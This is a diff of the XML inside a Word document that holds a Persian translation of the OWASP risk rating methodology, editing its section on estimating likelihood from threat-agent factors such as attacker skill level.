-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>رویکرد های زیادی برای ارزیابی خطر وجود دارد. قسمت منابع در پایین،  تعدادی از رایج ترین آنهارا ببینید.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">رویکرد </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">OWASP </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> نشان داده شده در اینجا بر اساس متودولوژی استاندارد است و برای امنیت اپلیکیشن ها سفارشی شده.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
         <w:t>با مدل استاندارد خطر شروع می</w:t>
       </w:r>
       <w:r>
@@ -1535,8 +1537,326 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:t>قدم 2 : عوامل برای حدس احتمالات</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>زمانی که خطر بالقوه را شناسایی کردید و میخواهید ببینید که چقدر جدی است،</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اولین قدم حدس زدن احتمالات در بالاترین حد ممکن است، این یک اندازه گیری سخت که چقدر احتمال دارد این آسیب پذیری کشف شود و توسط یک </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>مهاجم</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> هک شود . نیازی نیست ما بیش از اندازه  در حدس زدن دقیق باشیم. در صورت کلی شناسایی اینکه</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> احتم</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ال خطر پایین، متوسط یا بالا است</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>، کافیست.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">برای متوجه شدن این موضوع عواملی وجود دارد . اولین مجموعه ی </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>آن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> به </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:val="single"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>عامل تهدید</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> درگیر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>، مرتبط است. هدف</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> تخمین زدن احتمال یک حمله ی موفق توسط یک گروه مهاجم است . لازم به ذکر است که عوامل گوناگونی میتوانند باعث نفوذ به یک آسیب پذیری شوند، پس معمولا بهتر است از بدترین سناریو استفاده</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> کنیم. برای مثال، یک شخص خودی اح</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">تمال مهاجم بودنش بیشتر است تا یک شخصی ار بیرون </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ولی به عواملی بستگی دارد.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>قدم 2 : عوامل برای حدس احتمالات</w:t>
+        <w:t>توجه داشته باش</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> که</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> هر عامل مجموعه گزینه هایی دارد، هر گزینه یک امتیاز احتمال بین 1 تا 9 دارد. از این عددها بعداً برای</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> برآورد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> کلی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> احتمال استفاده میشود.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1558,76 +1878,28 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>زمانی که خطر بالقوه را شناسایی کردید و میخواهید ببینید که چقدر جدی است،</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> اولین قدم حدس زدن احتمالات در بالاترین حد ممکن است، این یک اندازه گیری سخت که چقدر احتمال دارد این آسیب پذیری کشف شود و توسط یک </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>مهاجم</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> هک شود . نیازی نیست ما بیش از اندازه  در حدس زدن دقیق باشیم. در صورت کلی شناسایی اینکه</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> احتم</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ال خطر پایین، متوسط یا بالا است</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>، کافیست.</w:t>
+        <w:t xml:space="preserve">اولین مجموعه ی عوامل به </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:val="single"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>عامل تهدید</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> درگیر، وابسته است. هدف در اینجا حدس احتمال یک حمله ی موفق توسط این گروه مهاجمین است. بدترین حالت عامل تهدید را در نظر بگیر.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1661,108 +1933,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">برای متوجه شدن این موضوع عواملی وجود دارد . اولین مجموعه ی </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>آن</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> به </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>عامل تهدید</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> درگیر</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>، مرتبط است. هدف</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> تخمین زدن احتمال یک حمله ی موفق توسط یک گروه مهاجم است . لازم به ذکر است که عوامل گوناگونی میتوانند باعث نفوذ به یک آسیب پذیری شوند، پس معمولا بهتر است از بدترین سناریو استفاده</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> کنیم. برای مثال، یک شخص خودی اح</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">تمال مهاجم بودنش بیشتر است تا یک شخصی ار بیرون </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ولی به عواملی بستگی دارد.</w:t>
+        <w:t>سطح مهارت</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1778,83 +1949,23 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>توجه داشته باش</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ی</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>د</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> که</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> هر عامل مجموعه گزینه هایی دارد، هر گزینه یک امتیاز احتمال بین 1 تا 9 دارد. از این عددها بعداً برای</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> برآورد</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> کلی</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> احتمال استفاده میشود.</w:t>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>این مهاجمین از نظر فنی چقدر مهارت دارند ؟ هیچ مهارت فنی (1)، کمی مهارت فنی (3)، کاربر حرفه ای کامپیوتر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>(4)، مهارت های برنامه نویسی و شبکه ای(6)، مهارت های تست نفوذ(9) .</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1868,37 +1979,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">اولین مجموعه ی عوامل به </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
